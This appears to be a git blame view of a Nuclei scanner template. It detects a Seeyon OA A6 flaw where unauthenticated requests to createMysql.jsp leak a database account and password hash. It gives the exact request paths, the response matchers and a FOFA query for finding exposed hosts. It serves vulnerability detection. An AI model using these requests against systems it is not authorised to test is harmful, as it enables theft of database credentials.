2023-09-18 12:37:42 +00:00
|
|
|
id: seeyon-createmysql-exposure
|
2023-09-05 12:25:45 +00:00
|
|
|
|
|
|
|
info:
|
2023-09-18 12:37:42 +00:00
|
|
|
name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
|
2023-09-05 12:25:45 +00:00
|
|
|
author: SleepingBag945
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.
|
|
|
|
reference:
|
|
|
|
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
|
|
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
|
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 2
|
|
|
|
fofa-query: title="致远A8+协同管理软件.A6"
|
2023-09-05 12:25:45 +00:00
|
|
|
tags: seeyon,oa,info-leak
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/yyoa/createMysql.jsp"
|
|
|
|
- "{{BaseURL}}/yyoa/ext/createMysql.jsp"
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2023-09-05 12:25:45 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "root</br>"
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "[*][0-zA-Z]{40}</br>"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2023-10-14 11:27:55 +00:00
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100ee9988573daed066e9deadae2dddf213a5fd2325a44738ffc07d7ab96b3bd05102200ec1fe8f49e272746f2100a627d4a08d9a7a556c875629d32b68b86f11314cba:922c64590222798bb761d5b6d8e72950
|